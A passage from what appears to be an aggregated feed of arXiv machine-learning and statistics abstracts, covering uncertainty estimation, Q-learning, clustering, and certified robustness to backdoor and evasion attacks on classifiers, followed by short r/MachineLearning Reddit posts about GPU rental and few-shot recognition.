standard multi-label recognition benchmarks across two challenging low-label settings demonstrate the superior performance of our approach compared to state-of-the-art methods.  ( 3 min )
    Follow the Soldiers with Optimized Single-Shot Multibox Detection and Reinforcement Learning. (arXiv:2308.01389v1 [cs.RO])
    Nowadays, autonomous cars are gaining traction due to their numerous potential applications on battlefields and in resolving a variety of other real-world challenges. The main goal of our project is to build an autonomous system using DeepRacer which will follow a specific person (for our project, a soldier) when they will be moving in any direction. Two main components to accomplish this project is an optimized Single-Shot Multibox Detection (SSD) object detection model and a Reinforcement Learning (RL) model. We accomplished the task using SSD Lite instead of SSD and at the end, compared the results among SSD, SSD with Neural Computing Stick (NCS), and SSD Lite. Experimental results show that SSD Lite gives better performance among these three techniques and exhibits a considerable boost in inference speed (~2-3 times) without compromising accuracy.  ( 2 min )
    Improving Replay Sample Selection and Storage for Less Forgetting in Continual Learning. (arXiv:2308.01895v1 [cs.LG])
    Continual learning seeks to enable deep learners to train on a series of tasks of unknown length without suffering from the catastrophic forgetting of previous tasks. One effective solution is replay, which involves storing few previous experiences in memory and replaying them when learning the current task. However, there is still room for improvement when it comes to selecting the most informative samples for storage and determining the optimal number of samples to be stored. This study aims to address these issues with a novel comparison of the commonly used reservoir sampling to various alternative population strategies and providing a novel detailed analysis of how to find the optimal number of stored samples.  ( 2 min )
    Domain knowledge-informed Synthetic fault sample generation with Health Data Map for cross-domain Planetary Gearbox Fault Diagnosis. (arXiv:2305.19569v4 [cs.LG] UPDATED)
    Extensive research has been conducted on fault diagnosis of planetary gearboxes using vibration signals and deep learning (DL) approaches. However, DL-based methods are susceptible to the domain shift problem caused by varying operating conditions of the gearbox. Although domain adaptation and data synthesis methods have been proposed to overcome such domain shifts, they are often not directly applicable in real-world situations where only healthy data is available in the target domain. To tackle the challenge of extreme domain shift scenarios where only healthy data is available in the target domain, this paper proposes two novel domain knowledge-informed data synthesis methods utilizing the health data map (HDMap). The two proposed approaches are referred to as scaled CutPaste and FaultPaste. The HDMap is used to physically represent the vibration signal of the planetary gearbox as an image-like matrix, allowing for visualization of fault-related features. CutPaste and FaultPaste are then applied to generate faulty samples based on the healthy data in the target domain, using domain knowledge and fault signatures extracted from the source domain, respectively. In addition to generating realistic faults, the proposed methods introduce scaling of fault signatures for controlled synthesis of faults with various severity levels. A case study is conducted on a planetary gearbox testbed to evaluate the proposed approaches. The results show that the proposed methods are capable of accurately diagnosing faults, even in cases of extreme domain shift, and can estimate the severity of faults that have not been previously observed in the target domain.  ( 3 min )
    Interpretable Machine Learning for Discovery: Statistical Challenges \& Opportunities. (arXiv:2308.01475v1 [stat.ML])
    New technologies have led to vast troves of large and complex datasets across many scientific domains and industries. People routinely use machine learning techniques to not only process, visualize, and make predictions from this big data, but also to make data-driven discoveries. These discoveries are often made using Interpretable Machine Learning, or machine learning models and techniques that yield human understandable insights. In this paper, we discuss and review the field of interpretable machine learning, focusing especially on the techniques as they are often employed to generate new knowledge or make discoveries from large data sets. We outline the types of discoveries that can be made using Interpretable Machine Learning in both supervised and unsupervised settings. Additionally, we focus on the grand challenge of how to validate these discoveries in a data-driven manner, which promotes trust in machine learning systems and reproducibility in science. We discuss validation from both a practical perspective, reviewing approaches based on data-splitting and stability, as well as from a theoretical perspective, reviewing statistical results on model selection consistency and uncertainty quantification via statistical inference. Finally, we conclude by highlighting open challenges in using interpretable machine learning techniques to make discoveries, including gaps between theory and practice for validating data-driven-discoveries.  ( 2 min )
    URET: Universal Robustness Evaluation Toolkit (for Evasion). (arXiv:2308.01840v1 [cs.LG])
    Machine learning models are known to be vulnerable to adversarial evasion attacks as illustrated by image classification models. Thoroughly understanding such attacks is critical in order to ensure the safety and robustness of critical AI tasks. However, most evasion attacks are difficult to deploy against a majority of AI systems because they have focused on image domain with only few constraints. An image is composed of homogeneous, numerical, continuous, and independent features, unlike many other input types to AI systems used in practice. Furthermore, some input types include additional semantic and functional constraints that must be observed to generate realistic adversarial inputs. In this work, we propose a new framework to enable the generation of adversarial inputs irrespective of the input type and task domain. Given an input and a set of pre-defined input transformations, our framework discovers a sequence of transformations that result in a semantically correct and functional adversarial input. We demonstrate the generality of our approach on several diverse machine learning tasks with various input representations. We also show the importance of generating adversarial examples as they enable the deployment of mitigation techniques.  ( 2 min )
    How to Evaluate Uncertainty Estimates in Machine Learning for Regression?. (arXiv:2106.03395v2 [stat.ML] UPDATED)
    As neural networks become more popular, the need for accompanying uncertainty estimates increases. There are currently two main approaches to test the quality of these estimates. Most methods output a density. They can be compared by evaluating their loglikelihood on a test set. Other methods output a prediction interval directly. These methods are often tested by examining the fraction of test points that fall inside the corresponding prediction intervals. Intuitively both approaches seem logical. However, we demonstrate through both theoretical arguments and simulations that both ways of evaluating the quality of uncertainty estimates have serious flaws. Firstly, both approaches cannot disentangle the separate components that jointly create the predictive uncertainty, making it difficult to evaluate the quality of the estimates of these components. Secondly, a better loglikelihood does not guarantee better prediction intervals, which is what the methods are often used for in practice. Moreover, the current approach to test prediction intervals directly has additional flaws. We show why it is fundamentally flawed to test a prediction or confidence interval on a single test set. At best, marginal coverage is measured, implicitly averaging out overconfident and underconfident predictions. A much more desirable property is pointwise coverage, requiring the correct coverage for each prediction. We demonstrate through practical examples that these effects can result in favoring a method, based on the predictive uncertainty, that has undesirable behaviour of the confidence or prediction intervals. Finally, we propose a simulation-based testing approach that addresses these problems while still allowing easy comparison between different methods.  ( 3 min )
  • Open

    Telematics Combined Actuarial Neural Networks for Cross-Sectional and Longitudinal Claim Count Data. (arXiv:2308.01729v1 [stat.ML])
    We present novel cross-sectional and longitudinal claim count models for vehicle insurance built upon the Combined Actuarial Neural Network (CANN) framework proposed by Mario W\"uthrich and Michael Merz. The CANN approach combines a classical actuarial model, such as a generalized linear model, with a neural network. This blending of models results in a two-component model comprising a classical regression model and a neural network part. The CANN model leverages the strengths of both components, providing a solid foundation and interpretability from the classical model while harnessing the flexibility and capacity to capture intricate relationships and interactions offered by the neural network. In our proposed models, we use well-known log-linear claim count regression models for the classical regression part and a multilayer perceptron (MLP) for the neural network part. The MLP part is used to process telematics car driving data given as a vector characterizing the driving behavior of each insured driver. In addition to the Poisson and negative binomial distributions for cross-sectional data, we propose a procedure for training our CANN model with a multivariate negative binomial (MVNB) specification. By doing so, we introduce a longitudinal model that accounts for the dependence between contracts from the same insured. Our results reveal that the CANN models exhibit superior performance compared to log-linear models that rely on manually engineered telematics features.
    Is your data alignable? Principled and interpretable alignability testing and integration of single-cell data. (arXiv:2308.01839v1 [q-bio.QM])
    Single-cell data integration can provide a comprehensive molecular view of cells, and many algorithms have been developed to remove unwanted technical or biological variations and integrate heterogeneous single-cell datasets. Despite their wide usage, existing methods suffer from several fundamental limitations. In particular, we lack a rigorous statistical test for whether two high-dimensional single-cell datasets are alignable (and therefore should even be aligned). Moreover, popular methods can substantially distort the data during alignment, making the aligned data and downstream analysis difficult to interpret. To overcome these limitations, we present a spectral manifold alignment and inference (SMAI) framework, which enables principled and interpretable alignability testing and structure-preserving integration of single-cell data. SMAI provides a statistical test to robustly determine the alignability between datasets to avoid misleading inference, and is justified by high-dimensional statistical theory. On a diverse range of real and simulated benchmark datasets, it outperforms commonly used alignment methods. Moreover, we show that SMAI improves various downstream analyses such as identification of differentially expressed genes and imputation of single-cell spatial transcriptomics, providing further biological insights. SMAI's interpretability also enables quantification and a deeper understanding of the sources of technical confounders in single-cell data.
    Optimal Training of Mean Variance Estimation Neural Networks. (arXiv:2302.08875v2 [stat.ML] UPDATED)
    This paper focusses on the optimal implementation of a Mean Variance Estimation network (MVE network) (Nix and Weigend, 1994). This type of network is often used as a building block for uncertainty estimation methods in a regression setting, for instance Concrete dropout (Gal et al., 2017) and Deep Ensembles (Lakshminarayanan et al., 2017). Specifically, an MVE network assumes that the data is produced from a normal distribution with a mean function and variance function. The MVE network outputs a mean and variance estimate and optimizes the network parameters by minimizing the negative loglikelihood. In our paper, we present two significant insights. Firstly, the convergence difficulties reported in recent work can be relatively easily prevented by following the simple yet often overlooked recommendation from the original authors that a warm-up period should be used. During this period, only the mean is optimized with a fixed variance. We demonstrate the effectiveness of this step through experimentation, highlighting that it should be standard practice. As a sidenote, we examine whether, after the warm-up, it is beneficial to fix the mean while optimizing the variance or to optimize both simultaneously. Here, we do not observe a substantial difference. Secondly, we introduce a novel improvement of the MVE network: separate regularization of the mean and the variance estimate. We demonstrate, both on toy examples and on a number of benchmark UCI regression data sets, that following the original recommendations and the novel separate regularization can lead to significant improvements.
    Normative framework for deriving neural networks with multi-compartmental neurons and non-Hebbian plasticity. (arXiv:2302.10051v2 [q-bio.NC] UPDATED)
    An established normative approach for understanding the algorithmic basis of neural computation is to derive online algorithms from principled computational objectives and evaluate their compatibility with anatomical and physiological observations. Similarity matching objectives have served as successful starting points for deriving online algorithms that map onto neural networks (NNs) with point neurons and Hebbian/anti-Hebbian plasticity. These NN models account for many anatomical and physiological observations; however, the objectives have limited computational power and the derived NNs do not explain multi-compartmental neuronal structures and non-Hebbian forms of plasticity that are prevalent throughout the brain. In this article, we unify and generalize recent extensions of the similarity matching approach to address more complex objectives, including a large class of unsupervised and self-supervised learning tasks that can be formulated as symmetric generalized eigenvalue problems or nonnegative matrix factorization problems. Interestingly, the online algorithms derived from these objectives naturally map onto NNs with multi-compartmental neurons and local, non-Hebbian learning rules. Therefore, this unified extension of the similarity matching approach provides a normative framework that facilitates understanding multi-compartmental neuronal structures and non-Hebbian plasticity found throughout the brain.
    Online covariance estimation for stochastic gradient descent under Markovian sampling. (arXiv:2308.01481v1 [math.ST])
    We study the online overlapping batch-means covariance estimator for Stochastic Gradient Descent (SGD) under Markovian sampling. We show that the convergence rates of the covariance estimator are $O\big(\sqrt{d}\,n^{-1/8}(\log n)^{1/4}\big)$ and $O\big(\sqrt{d}\,n^{-1/8}\big)$ under state-dependent and state-independent Markovian sampling, respectively, with $d$ representing dimensionality and $n$ denoting the number of observations or SGD iterations. Remarkably, these rates match the best-known convergence rate previously established for the independent and identically distributed ($\iid$) case by \cite{zhu2021online}, up to logarithmic factors. Our analysis overcomes significant challenges that arise due to Markovian sampling, leading to the introduction of additional error terms and complex dependencies between the blocks of the batch-means covariance estimator. Moreover, we establish the convergence rate for the first four moments of the $\ell_2$ norm of the error of SGD dynamics under state-dependent Markovian data, which holds potential interest as an independent result. To validate our theoretical findings, we provide numerical illustrations to derive confidence intervals for SGD when training linear and logistic regression models under Markovian sampling. Additionally, we apply our approach to tackle the intriguing problem of strategic classification with logistic regression, where adversaries can adaptively modify features during the training process to increase their chances of being classified in a specific target class.
    Minimax Optimal $Q$ Learning with Nearest Neighbors. (arXiv:2308.01490v1 [cs.LG])
    $Q$ learning is a popular model free reinforcement learning method. Most of existing works focus on analyzing $Q$ learning for finite state and action spaces. If the state space is continuous, then the original $Q$ learning method can not be directly used. A modification of the original $Q$ learning method was proposed in (Shah and Xie, 2018), which estimates $Q$ values with nearest neighbors. Such modification makes $Q$ learning suitable for continuous state space. (Shah and Xie, 2018) shows that the convergence rate of estimated $Q$ function is $\tilde{O}(T^{-1/(d+3)})$, which is slower than the minimax lower bound $\tilde{\Omega}(T^{-1/(d+2)})$, indicating that this method is not efficient. This paper proposes two new $Q$ learning methods to bridge the gap of convergence rates in (Shah and Xie, 2018), with one of them being offline, while the other is online. Despite that we still use nearest neighbor approach to estimate $Q$ function, the algorithms are crucially different from (Shah and Xie, 2018). In particular, we replace the kernel nearest neighbor in discretized region with a direct nearest neighbor approach. Consequently, our approach significantly improves the convergence rate. Moreover, the time complexity is also significantly improved in high dimensional state spaces. Our analysis shows that both offline and online methods are minimax rate optimal.
    Random Planted Forest: a directly interpretable tree ensemble. (arXiv:2012.14563v3 [stat.ML] UPDATED)
    We introduce a novel interpretable tree based algorithm for prediction in a regression setting. Our motivation is to estimate the unknown regression function from a functional decomposition perspective in which the functional components correspond to lower order interaction terms. The idea is to modify the random forest algorithm by keeping certain leaves after they are split instead of deleting them. This leads to non-binary trees which we refer to as planted trees. An extension to a forest leads to our random planted forest algorithm. Additionally, the maximum number of covariates which can interact within a leaf can be bounded. If we set this interaction bound to one, the resulting estimator is a sum of one-dimensional functions. In the other extreme case, if we do not set a limit, the resulting estimator and corresponding model place no restrictions on the form of the regression function. In a simulation study we find encouraging prediction and visualisation properties of our random planted forest method. We also develop theory for an idealized version of random planted forests in cases where the interaction bound is low. We show that if it is smaller than three, the idealized version achieves asymptotically optimal convergence rates up to a logarithmic factor. Code is available on GitHub https://github.com/PlantedML/randomPlantedForest.
    Non-equilibrium physics: from spin glasses to machine and neural learning. (arXiv:2308.01538v1 [cond-mat.dis-nn])
    Disordered many-body systems exhibit a wide range of emergent phenomena across different scales. These complex behaviors can be utilized for various information processing tasks such as error correction, learning, and optimization. Despite the empirical success of utilizing these systems for intelligent tasks, the underlying principles that govern their emergent intelligent behaviors remain largely unknown. In this thesis, we aim to characterize such emergent intelligence in disordered systems through statistical physics. We chart a roadmap for our efforts in this thesis based on two axes: learning mechanisms (long-term memory vs. working memory) and learning dynamics (artificial vs. natural). Throughout our journey, we uncover relationships between learning mechanisms and physical dynamics that could serve as guiding principles for designing intelligent systems. We hope that our investigation into the emergent intelligence of seemingly disparate learning systems can expand our current understanding of intelligence beyond neural systems and uncover a wider range of computational substrates suitable for AI applications.
    RAB: Provable Robustness Against Backdoor Attacks. (arXiv:2003.08904v8 [cs.LG] UPDATED)
    Recent studies have shown that deep neural networks (DNNs) are vulnerable to adversarial attacks, including evasion and backdoor (poisoning) attacks. On the defense side, there have been intensive efforts on improving both empirical and provable robustness against evasion attacks; however, the provable robustness against backdoor attacks still remains largely unexplored. In this paper, we focus on certifying the machine learning model robustness against general threat models, especially backdoor attacks. We first provide a unified framework via randomized smoothing techniques and show how it can be instantiated to certify the robustness against both evasion and backdoor attacks. We then propose the first robust training process, RAB, to smooth the trained model and certify its robustness against backdoor attacks. We prove the robustness bound for machine learning models trained with RAB and prove that our robustness bound is tight. In addition, we theoretically show that it is possible to train the robust smoothed models efficiently for simple models such as K-nearest neighbor classifiers, and we propose an exact smooth-training algorithm that eliminates the need to sample from a noise distribution for such models. Empirically, we conduct comprehensive experiments for different machine learning (ML) models such as DNNs, support vector machines, and K-NN models on MNIST, CIFAR-10, and ImageNette datasets and provide the first benchmark for certified robustness against backdoor attacks. In addition, we evaluate K-NN models on a spambase tabular dataset to demonstrate the advantages of the proposed exact algorithm. Both the theoretic analysis and the comprehensive evaluation on diverse ML models and datasets shed light on further robust learning strategies against general training time attacks.
    How to Evaluate Uncertainty Estimates in Machine Learning for Regression?. (arXiv:2106.03395v2 [stat.ML] UPDATED)
    As neural networks become more popular, the need for accompanying uncertainty estimates increases. There are currently two main approaches to test the quality of these estimates. Most methods output a density. They can be compared by evaluating their loglikelihood on a test set. Other methods output a prediction interval directly. These methods are often tested by examining the fraction of test points that fall inside the corresponding prediction intervals. Intuitively both approaches seem logical. However, we demonstrate through both theoretical arguments and simulations that both ways of evaluating the quality of uncertainty estimates have serious flaws. Firstly, both approaches cannot disentangle the separate components that jointly create the predictive uncertainty, making it difficult to evaluate the quality of the estimates of these components. Secondly, a better loglikelihood does not guarantee better prediction intervals, which is what the methods are often used for in practice. Moreover, the current approach to test prediction intervals directly has additional flaws. We show why it is fundamentally flawed to test a prediction or confidence interval on a single test set. At best, marginal coverage is measured, implicitly averaging out overconfident and underconfident predictions. A much more desirable property is pointwise coverage, requiring the correct coverage for each prediction. We demonstrate through practical examples that these effects can result in favoring a method, based on the predictive uncertainty, that has undesirable behaviour of the confidence or prediction intervals. Finally, we propose a simulation-based testing approach that addresses these problems while still allowing easy comparison between different methods.
    Causal thinking for decision making on Electronic Health Records: why and how. (arXiv:2308.01605v1 [stat.ME])
    Accurate predictions, as with machine learning, may not suffice to provide optimal healthcare for every patient. Indeed, prediction can be driven by shortcuts in the data, such as racial biases. Causal thinking is needed for data-driven decisions. Here, we give an introduction to the key elements, focusing on routinely-collected data, electronic health records (EHRs) and claims data. Using such data to assess the value of an intervention requires care: temporal dependencies and existing practices easily confound the causal effect. We present a step-by-step framework to help build valid decision making from real-life patient records by emulating a randomized trial before individualizing decisions, eg with machine learning. Our framework highlights the most important pitfalls and considerations in analysing EHRs or claims data to draw causal conclusions. We illustrate the various choices in studying the effect of albumin on sepsis mortality in the Medical Information Mart for Intensive Care database (MIMIC-IV). We study the impact of various choices at every step, from feature extraction to causal-estimator selection. In a tutorial spirit, the code and the data are openly available.
    Compressed and distributed least-squares regression: convergence rates with applications to Federated Learning. (arXiv:2308.01358v1 [cs.LG])
    In this paper, we investigate the impact of compression on stochastic gradient algorithms for machine learning, a technique widely used in distributed and federated learning. We underline differences in terms of convergence rates between several unbiased compression operators, that all satisfy the same condition on their variance, thus going beyond the classical worst-case analysis. To do so, we focus on the case of least-squares regression (LSR) and analyze a general stochastic approximation algorithm for minimizing quadratic functions relying on a random field. We consider weak assumptions on the random field, tailored to the analysis (specifically, expected H\"older regularity), and on the noise covariance, enabling the analysis of various randomizing mechanisms, including compression. We then extend our results to the case of federated learning. More formally, we highlight the impact on the convergence of the covariance $\mathfrak{C}_{\mathrm{ania}}$ of the additive noise induced by the algorithm. We demonstrate despite the non-regularity of the stochastic field, that the limit variance term scales with $\mathrm{Tr}(\mathfrak{C}_{\mathrm{ania}} H^{-1})/K$ (where $H$ is the Hessian of the optimization problem and $K$ the number of iterations) generalizing the rate for the vanilla LSR case where it is $\sigma^2 \mathrm{Tr}(H H^{-1}) / K = \sigma^2 d / K$ (Bach and Moulines, 2013). Then, we analyze the dependency of $\mathfrak{C}_{\mathrm{ania}}$ on the compression strategy and ultimately its impact on convergence, first in the centralized case, then in two heterogeneous FL frameworks.
    Matrix Estimation for Individual Fairness. (arXiv:2302.02096v2 [cs.LG] UPDATED)
    In recent years, multiple notions of algorithmic fairness have arisen. One such notion is individual fairness (IF), which requires that individuals who are similar receive similar treatment. In parallel, matrix estimation (ME) has emerged as a natural paradigm for handling noisy data with missing values. In this work, we connect the two concepts. We show that pre-processing data using ME can improve an algorithm's IF without sacrificing performance. Specifically, we show that using a popular ME method known as singular value thresholding (SVT) to pre-process the data provides a strong IF guarantee under appropriate conditions. We then show that, under analogous conditions, SVT pre-processing also yields estimates that are consistent and approximately minimax optimal. As such, the ME pre-processing step does not, under the stated conditions, increase the prediction error of the base algorithm, i.e., does not impose a fairness-performance trade-off. We verify these results on synthetic and real data.
    Stable and consistent density-based clustering via multiparameter persistence. (arXiv:2005.09048v3 [math.ST] UPDATED)
    We consider the degree-Rips construction from topological data analysis, which provides a density-sensitive, multiparameter hierarchical clustering algorithm. We analyze its stability to perturbations of the input data using the correspondence-interleaving distance, a metric for hierarchical clusterings that we introduce. Taking certain one-parameter slices of degree-Rips recovers well-known methods for density-based clustering, but we show that these methods are unstable. However, we prove that degree-Rips, as a multiparameter object, is stable, and we propose an alternative approach for taking slices of degree-Rips, which yields a one-parameter hierarchical clustering algorithm with better stability properties. We prove that this algorithm is consistent, using the correspondence-interleaving distance. We provide an algorithm for extracting a single clustering from one-parameter hierarchical clusterings, which is stable with respect to the correspondence-interleaving distance. And, we integrate these methods into a pipeline for density-based clustering, which we call Persistable. Adapting tools from multiparameter persistent homology, we propose visualization tools that guide the selection of all parameters of the pipeline. We demonstrate Persistable on benchmark datasets, showing that it identifies multi-scale cluster structure in data.
    Efficiency of First-Order Methods for Low-Rank Tensor Recovery with the Tensor Nuclear Norm Under Strict Complementarity. (arXiv:2308.01677v1 [math.OC])
    We consider convex relaxations for recovering low-rank tensors based on constrained minimization over a ball induced by the tensor nuclear norm, recently introduced in \cite{tensor_tSVD}. We build on a recent line of results that considered convex relaxations for the recovery of low-rank matrices and established that under a strict complementarity condition (SC), both the convergence rate and per-iteration runtime of standard gradient methods may improve dramatically. We develop the appropriate strict complementarity condition for the tensor nuclear norm ball and obtain the following main results under this condition: 1. When the objective to minimize is of the form $f(\mX)=g(\mA\mX)+\langle{\mC,\mX}\rangle$ , where $g$ is strongly convex and $\mA$ is a linear map (e.g., least squares), a quadratic growth bound holds, which implies linear convergence rates for standard projected gradient methods, despite the fact that $f$ need not be strongly convex. 2. For a smooth objective function, when initialized in certain proximity of an optimal solution which satisfies SC, standard projected gradient methods only require SVD computations (for projecting onto the tensor nuclear norm ball) of rank that matches the tubal rank of the optimal solution. In particular, when the tubal rank is constant, this implies nearly linear (in the size of the tensor) runtime per iteration, as opposed to super linear without further assumptions. 3. For a nonsmooth objective function which admits a popular smooth saddle-point formulation, we derive similar results to the latter for the well known extragradient method. An additional contribution which may be of independent interest, is the rigorous extension of many basic results regarding tensors of arbitrary order, which were previously obtained only for third-order tensors.
    An efficient, provably exact, practical algorithm for the 0-1 loss linear classification problem. (arXiv:2306.12344v2 [cs.LG] UPDATED)
    Algorithms for solving the linear classification problem have a long history, dating back at least to 1936 with linear discriminant analysis. For linearly separable data, many algorithms can obtain the exact solution to the corresponding 0-1 loss classification problem efficiently, but for data which is not linearly separable, it has been shown that this problem, in full generality, is NP-hard. Alternative approaches all involve approximations of some kind, including the use of surrogates for the 0-1 loss (for example, the hinge or logistic loss) or approximate combinatorial search, none of which can be guaranteed to solve the problem exactly. Finding efficient algorithms to obtain an exact i.e. globally optimal solution for the 0-1 loss linear classification problem with fixed dimension, remains an open problem. In research we report here, we detail the rigorous construction of a new algorithm, incremental cell enumeration (ICE), that can solve the 0-1 loss classification problem exactly in polynomial time. We prove correctness using concepts from the theory of hyperplane arrangements and oriented matroids. We demonstrate the effectiveness of this algorithm on synthetic and real-world datasets, showing optimal accuracy both in and out-of-sample, in practical computational time. We also empirically demonstrate how the use of approximate upper bound leads to polynomial time run-time improvements to the algorithm whilst retaining exactness. To our knowledge, this is the first, rigorously-proven polynomial time, practical algorithm for this long-standing problem.
    Robust, randomized preconditioning for kernel ridge regression. (arXiv:2304.12465v3 [math.NA] UPDATED)
    This paper introduces two randomized preconditioning techniques for robustly solving kernel ridge regression (KRR) problems with a medium to large number of data points ($10^4 \leq N \leq 10^7$). The first method, RPCholesky preconditioning, is capable of accurately solving the full-data KRR problem in $O(N^2)$ arithmetic operations, assuming sufficiently rapid polynomial decay of the kernel matrix eigenvalues. The second method, KRILL preconditioning, offers an accurate solution to a restricted version of the KRR problem involving $k \ll N$ selected data centers at a cost of $O((N + k^2) k \log k)$ operations. The proposed methods solve a broad range of KRR problems and overcome the failure modes of previous KRR preconditioners, making them ideal for practical applications.  ( 2 min )
    Distribution-Free Inference for the Regression Function of Binary Classification. (arXiv:2308.01835v1 [stat.ML])
    One of the key objects of binary classification is the regression function, i.e., the conditional expectation of the class labels given the inputs. With the regression function not only a Bayes optimal classifier can be defined, but it also encodes the corresponding misclassification probabilities. The paper presents a resampling framework to construct exact, distribution-free and non-asymptotically guaranteed confidence regions for the true regression function for any user-chosen confidence level. Then, specific algorithms are suggested to demonstrate the framework. It is proved that the constructed confidence regions are strongly consistent, that is, any false model is excluded in the long run with probability one. The exclusion is quantified with probably approximately correct type bounds, as well. Finally, the algorithms are validated via numerical experiments, and the methods are compared to approximate asymptotic confidence ellipsoids.  ( 2 min )
    Statistical Estimation Under Distribution Shift: Wasserstein Perturbations and Minimax Theory. (arXiv:2308.01853v1 [stat.ML])
    Distribution shifts are a serious concern in modern statistical learning as they can systematically change the properties of the data away from the truth. We focus on Wasserstein distribution shifts, where every data point may undergo a slight perturbation, as opposed to the Huber contamination model where a fraction of observations are outliers. We formulate and study shifts beyond independent perturbations, exploring Joint Distribution Shifts, where the per-observation perturbations can be coordinated. We analyze several important statistical problems, including location estimation, linear regression, and non-parametric density estimation. Under a squared loss for mean estimation and prediction error in linear regression, we find the exact minimax risk, a least favorable perturbation, and show that the sample mean and least squares estimators are respectively optimal. This holds for both independent and joint shifts, but the least favorable perturbations and minimax risks differ. For other problems, we provide nearly optimal estimators and precise finite-sample bounds. We also introduce several tools for bounding the minimax risk under distribution shift, such as a smoothing technique for location families, and generalizations of classical tools including least favorable sequences of priors, the modulus of continuity, Le Cam's, Fano's, and Assouad's methods.  ( 2 min )
    Adversarial Meta-Learning of Gamma-Minimax Estimators That Leverage Prior Knowledge. (arXiv:2012.05465v5 [stat.ME] UPDATED)
    Bayes estimators are well known to provide a means to incorporate prior knowledge that can be expressed in terms of a single prior distribution. However, when this knowledge is too vague to express with a single prior, an alternative approach is needed. Gamma-minimax estimators provide such an approach. These estimators minimize the worst-case Bayes risk over a set $\Gamma$ of prior distributions that are compatible with the available knowledge. Traditionally, Gamma-minimaxity is defined for parametric models. In this work, we define Gamma-minimax estimators for general models and propose adversarial meta-learning algorithms to compute them when the set of prior distributions is constrained by generalized moments. Accompanying convergence guarantees are also provided. We also introduce a neural network class that provides a rich, but finite-dimensional, class of estimators from which a Gamma-minimax estimator can be selected. We illustrate our method in two settings, namely entropy estimation and a prediction problem that arises in biodiversity studies.  ( 2 min )
    Interpretable Machine Learning for Discovery: Statistical Challenges \& Opportunities. (arXiv:2308.01475v1 [stat.ML])
    New technologies have led to vast troves of large and complex datasets across many scientific domains and industries. People routinely use machine learning techniques to not only process, visualize, and make predictions from this big data, but also to make data-driven discoveries. These discoveries are often made using Interpretable Machine Learning, or machine learning models and techniques that yield human understandable insights. In this paper, we discuss and review the field of interpretable machine learning, focusing especially on the techniques as they are often employed to generate new knowledge or make discoveries from large data sets. We outline the types of discoveries that can be made using Interpretable Machine Learning in both supervised and unsupervised settings. Additionally, we focus on the grand challenge of how to validate these discoveries in a data-driven manner, which promotes trust in machine learning systems and reproducibility in science. We discuss validation from both a practical perspective, reviewing approaches based on data-splitting and stability, as well as from a theoretical perspective, reviewing statistical results on model selection consistency and uncertainty quantification via statistical inference. Finally, we conclude by highlighting open challenges in using interpretable machine learning techniques to make discoveries, including gaps between theory and practice for validating data-driven-discoveries.  ( 2 min )
    Confident Neural Network Regression with Bootstrapped Deep Ensembles. (arXiv:2202.10903v2 [stat.ML] UPDATED)
    With the rise of the popularity and usage of neural networks, trustworthy uncertainty estimation is becoming increasingly essential. One of the most prominent uncertainty estimation methods is Deep Ensembles (Lakshminarayanan et al., 2017) . A classical parametric model has uncertainty in the parameters due to the fact that the data on which the model is build is a random sample. A modern neural network has an additional uncertainty component since the optimization of the network is random. Lakshminarayanan et al. (2017) noted that Deep Ensembles do not incorporate the classical uncertainty induced by the effect of finite data. In this paper, we present a computationally cheap extension of Deep Ensembles for the regression setting, called Bootstrapped Deep Ensembles, that explicitly takes this classical effect of finite data into account using a modified version of the parametric bootstrap. We demonstrate through an experimental study that our method significantly improves upon standard Deep Ensembles  ( 2 min )
    Fast Slate Policy Optimization: Going Beyond Plackett-Luce. (arXiv:2308.01566v1 [cs.LG])
    An increasingly important building block of large scale machine learning systems is based on returning slates; an ordered lists of items given a query. Applications of this technology include: search, information retrieval and recommender systems. When the action space is large, decision systems are restricted to a particular structure to complete online queries quickly. This paper addresses the optimization of these large scale decision systems given an arbitrary reward function. We cast this learning problem in a policy optimization framework and propose a new class of policies, born from a novel relaxation of decision functions. This results in a simple, yet efficient learning algorithm that scales to massive action spaces. We compare our method to the commonly adopted Plackett-Luce policy class and demonstrate the effectiveness of our approach on problems with action space sizes in the order of millions.  ( 2 min )

  • Open

    [D] GPU/Machine on-demand rental that runs Windows 10+ as host OS? (I know, I know...)
    Anyone know of a cloud service renting on-demand GPU instances (RTX 4090 preferably) that run Windows 10 or newer? Believe me, I know... I rent on-demand instances from vast.ai for Linux and have been exceedingly happy with their services. I've also used paperspace in the past with good success. Unfortunately, we are in need of RTX 4090s (or roughly equivalent performing Tesla cards) that run on a host OS of Windows 10+ (Server/Win11/etc all fine) because a lot of the modeling software in the industry I work in runs on Windows-only, which is absurd, but nevertheless the truth. The fastest I can find are A6000s on paperspace which won't cut the mustard. At the moment we have a 3090 and a bunch of 3070s on-prem which are doing OK but the RTX 4090 is simply much much better, and unsurprisingly the Windows-only software is also not coded in a way that takes advantage of multiple GPUs all that well either. Thanks for any help or referrals provided, I really appreciate it. (Have checked paperspace, vastai, runpod, and a few other smaller ones to no avail) submitted by /u/kyleboddy [link] [comments]  ( 9 min )
    [D] How do I improve performance?
    Hello everyone. I am new to this sub so please go easy on me lol. I want to implement a neural net that recognizes whether an object in an image matches one of a set of objects with limited training data. I already have worked on a siamese network implementation with triplet loss and ResNet, but I am not getting great performance. Should I do something else? For extra info, there are roughly 300 objects/classes and around 7 images per object (most are augmented images) submitted by /u/Nearby_Ad_5644 [link] [comments]  ( 8 min )
    [R] Learning to Model the World with Language - UC Berkeley 2023 - Dynalang an agent that learns a multimodal world model that predicts future text and image representations and learns to act from imagined model rollouts!
    Paper: https://arxiv.org/abs/2308.01399 Github: https://github.com/jlin816/dynalang Code coming soon! Abstract: To interact with humans in the world, agents need to understand the diverse types of language that people use, relate them to the visual world, and act based on them. While current agents learn to execute simple language instructions from task rewards, we aim to build agents that leverage diverse language that conveys general knowledge, describes the state of the world, provides interactive feedback, and more. Our key idea is that language helps agents predict the future: what will be observed, how the world will behave, and which situations will be rewarded. This perspective unifies language understanding with future prediction as a powerful self-supervised learning object…  ( 9 min )
    [P] I created ScoreCast, a tool to predict the outcome of football games in minor football leagues.
